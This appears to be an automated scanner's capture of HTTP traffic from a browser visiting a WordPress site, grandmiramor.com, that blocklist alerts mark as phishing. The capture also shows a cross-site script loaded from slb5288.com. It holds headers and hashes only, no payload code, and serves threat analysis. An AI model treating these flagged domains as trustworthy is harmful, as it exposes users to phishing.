cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5070
Md5:    0856fdb55f19f03a1bec38b3d6e0ac77
Sha1:   89accd230fba95fe0049678070817b36ead015fa
Sha256: 17c6e6f9bb8f4261fff2dc2a43ed994986418761624b8afead768e89927594f2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F81517ad5-7c1b-49aa-9ba9-dbfa36fbb071.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 13882
x-amzn-requestid: 9022b0b3-31d5-4149-a969-02514f11b95a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEvzNHjMoAMFWMg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9347-0e8354a02bef623644714e31;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:40:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ve4q5FDkwMGhPK6ZVVVCZtoBTaGaz43r_PwINzwS5Nx5tcZeQkVIfw==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:49:47 GMT
age: 62601
etag: "1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13882
Md5:    64d79191f005c9876b952c5f948aa0f7
Sha1:   1102dbdcbcabf5c25d17840f8f00d5b55b9b8f0a
Sha256: 00fb36c3d322e8302c5ce202d6d4119d637510cd6f3b63e1347781ec3bb9d7fc
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F50d7d834-f80d-4fd9-a728-24643ed00c45.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6789
x-amzn-requestid: 4d94ce1b-d18f-43b8-bb4d-e7093f9bea42
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCvd2G9UIAMFrEg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637dc5f2-64a570135be59b83031811da;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 07:04:18 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: JygkDI7XSvlgurUTot874ZAXlOIqnv4cntMQ55IvHVqw93JBcksZjQ==
via: 1.1 4d7fa73f804f1c93f20cfc24c4b1266e.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:15:22 GMT
age: 28666
etag: "303c571b13b05fcf27ee1159d8fdf6369aaef0a2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6789
Md5:    d9d93b2a6875d446c3467eb49767eef5
Sha1:   303c571b13b05fcf27ee1159d8fdf6369aaef0a2
Sha256: 2a2345a925e0187979930a7f2de8548957ad9f2baae77364dcb157286e2b3fcf
                                        
                                            GET / HTTP/1.1 
Host: www.grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
                                         156.240.38.111
HTTP/2 301 Moved Permanently
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:08 GMT
location: https://grandmiramor.com/
x-powered-by: PHP/7.4.21
x-redirect-by: WordPress
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7462
Md5:    b4157f2c5c3c77ce699324ecb08f47c7
Sha1:   a7d9135f9d01ba13c3cdaf8b038c70212f159297
Sha256: 2305f7afee95bb34d9e8dbff571c6b146ba7b694be96e9e925c32d1f41785916

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:09 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:09 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 217
last-modified: Wed, 02 Nov 2022 08:36:11 GMT
etag: "63622bfb-d9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /vue.min.js HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 782
last-modified: Fri, 30 Sep 2022 07:09:38 GMT
etag: "63369632-30e"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   782
Md5:    29f2152f14b5c844d1b3ea97b80af53e
Sha1:   9430ba54802c8288c821c37ef92971b0642e9034
Sha256: b96b30cb262bed24d33bd1ff6c5470f8e2a12616495d8de12bae4e70fcf7d7f2

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/js/skip-link-focus-fix.js?ver=20151215 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 685
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
etag: "6360d7e9-2ad"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   685
Md5:    93d421fd7576b0ca9c359ffe2fa16113
Sha1:   eacce35258f14fcd79bea2bc23f4140d25874322
Sha256: 14af47320898bd93f367026f7833c9956f14e24856976e4f9e10be31155cdcf2
                                        
                                            GET /wp-content/uploads/2022/11/53abe96dly1h8fwde0v1lj20k00zk420-480x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 33059
last-modified: Thu, 24 Nov 2022 13:28:59 GMT
etag: "637f719b-8123"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 480x450, components 3\012- data
Size:   33059
Md5:    836fa30640d2c1b10f68a4d438380ea4
Sha1:   50436ad8dfe910c9c3b65d8333120897ad9f4632
Sha256: 1b615ea01ce8cc4435beff664330a906de2ece14552456d6801d42661dcd3fe8
                                        
                                            GET /wp-content/uploads/2022/11/6272b9226477f_watermark-750x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 44384
last-modified: Thu, 24 Nov 2022 13:27:33 GMT
etag: "637f7145-ad60"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   44384
Md5:    6f2159e40ba10449f7516da923e51c24
Sha1:   10414c7c87c8f5f9b4123509d1c714d943d2a8a9
Sha256: 7e75542406eab344d8963bf4213d83197fd07a4298d52bf4ca29725443d050d7
                                        
                                            GET /wp-content/uploads/2022/11/61e8f30edc3d6_watermark-750x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 63120
last-modified: Wed, 23 Nov 2022 13:23:28 GMT
etag: "637e1ed0-f690"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   63120
Md5:    836fc026a5514cde22c88508e5369646
Sha1:   55ea9376c1019eb43f0dbc24d84fd9f828d4f523
Sha256: fca7ada6ea7eeb1f10c0e62962284f534248405505bfa9949261b35cc31947ef
                                        
                                            GET /wp-content/uploads/2022/11/62d9a7d1c52cd_watermark-750x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 38451
last-modified: Wed, 23 Nov 2022 13:22:04 GMT
etag: "637e1e7c-9633"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x450, components 3\012- data
Size:   38451
Md5:    b8079a34154725a41262998fd8d4a246
Sha1:   19ec6904eddd9c5e5ce4557215d8d4a4b178ce2e
Sha256: b52c518a9896a17db015edacec6b4d8e250b098da06ae022bd9b552cd33a7508
                                        
                                            GET /wp-content/uploads/2022/11/20221121181923_3263-840x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 39841
last-modified: Tue, 22 Nov 2022 12:33:28 GMT
etag: "637cc198-9ba1"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   39841
Md5:    dfa0a4a95dc95056ca66215093791729
Sha1:   688da4a454109acaa373277eee3b0684777f6b32
Sha256: c6df93c13f4a46a1d5334c3e5070e6e230c57cfd6ccb9e708c698286b317e538
                                        
                                            GET /wp-content/uploads/2022/11/707c-d3c610ae4773030da6a9034b0b5c5975-840x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 35784
last-modified: Tue, 22 Nov 2022 12:31:27 GMT
etag: "637cc11f-8bc8"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   35784
Md5:    078e0e1a13fad6abd3e1d30b02b61da4
Sha1:   a6866b672e041008b270be251f9555511d0f70f9
Sha256: d138f5bd799b8845ba9e201b260150d802e123ccf524858388a8011e2bb9c348
                                        
                                            GET /wp-content/uploads/2022/11/006p7P3Mgy1h8bzrc0qlaj30u01hcamc-480x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 28011
last-modified: Mon, 21 Nov 2022 12:43:34 GMT
etag: "637b7276-6d6b"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 480x450, components 3\012- data
Size:   28011
Md5:    f826177d827057caf9e1c1594552d3a6
Sha1:   4a9db5c5483d8745d21a47c3eb451f398bff03a0
Sha256: 6e90f2b034bcd96c87c770757971882ad813158ce20c3fa4a0594f81240fa50b
                                        
                                            GET /wp-content/uploads/2022/11/202211230140002891-840x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 68201
last-modified: Wed, 23 Nov 2022 13:20:33 GMT
etag: "637e1e21-10a69"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   68201
Md5:    2817af96cbbbe7ae5dd3288b7a06e694
Sha1:   de24c45b7d88c857a0545aa32ec912e38611405f
Sha256: 2a44ab8dc6acb5ea26622f184c33512232ed4301bf2eefa5f4f1cd51f4cfed1e
                                        
                                            GET /wp-content/uploads/2022/11/4ed4-6a2e66e8b35f36a1ce4419e6d23c51f9-840x450.jpg HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
content-length: 67107
last-modified: Tue, 22 Nov 2022 12:29:49 GMT
etag: "637cc0bd-10623"
expires: Sat, 24 Dec 2022 15:13:09 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 840x450, components 3\012- data
Size:   67107
Md5:    5cc2d2a0224af122831609c0c7ff547a
Sha1:   f8be0e13e558b40e31e1344a00bc9263eb2e2cfb
Sha256: 84c9bb1b38af1e3cbb24fd54613296b88702af6ec8a61793032f5878e74739f0
                                        
                                            POST /gsrsaovsslca2018 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:10 GMT
Content-Length: 1432
Connection: keep-alive
Expires: Mon, 28 Nov 2022 11:27:51 GMT
ETag: "375a16462a65c893805d1390a634f1b8aa4a5d8f"
Last-Modified: Thu, 24 Nov 2022 11:27:52 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3337
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 76f316492d67b521-OSL


--- Additional Info ---
Magic:  data
Size:   1432
Md5:    8ec1f825b67924ee4c83e4af2617343e
Sha1:   375a16462a65c893805d1390a634f1b8aa4a5d8f
Sha256: 49b90cb3fd89e5560c96d8ad354e6f1b09243d80b249595cf1f7cb2461bdc8d8
                                        
                                            POST /gsrsaovsslca2018 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:10 GMT
Content-Length: 1432
Connection: keep-alive
Expires: Mon, 28 Nov 2022 11:27:51 GMT
ETag: "375a16462a65c893805d1390a634f1b8aa4a5d8f"
Last-Modified: Thu, 24 Nov 2022 11:27:52 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3337
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 76f316492877fac8-OSL


--- Additional Info ---
Magic:  data
Size:   1432
Md5:    8ec1f825b67924ee4c83e4af2617343e
Sha1:   375a16462a65c893805d1390a634f1b8aa4a5d8f
Sha256: 49b90cb3fd89e5560c96d8ad354e6f1b09243d80b249595cf1f7cb2461bdc8d8
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "31C2DBFD1F0C2D7122602D2EA004DEFBF626D079DCCB54D8861EEBBEE849DB08"
Last-Modified: Thu, 24 Nov 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16546
Expires: Thu, 24 Nov 2022 19:48:56 GMT
Date: Thu, 24 Nov 2022 15:13:10 GMT
Connection: keep-alive

                                        
                                            GET /js/ob.js HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Mon, 05 Sep 2022 20:07:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"63165717-611"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document, ASCII text, with CRLF line terminators
Size:   841
Md5:    18ee27042fd971542702f542c58d35ea
Sha1:   29f542404c0d956d3303661f927ab9e5be70b041
Sha256: f8632df9f9df81c826a3276d492c3210508dd947cfa5be2846dc2cd02f2a8f8b
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meGCQYbw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
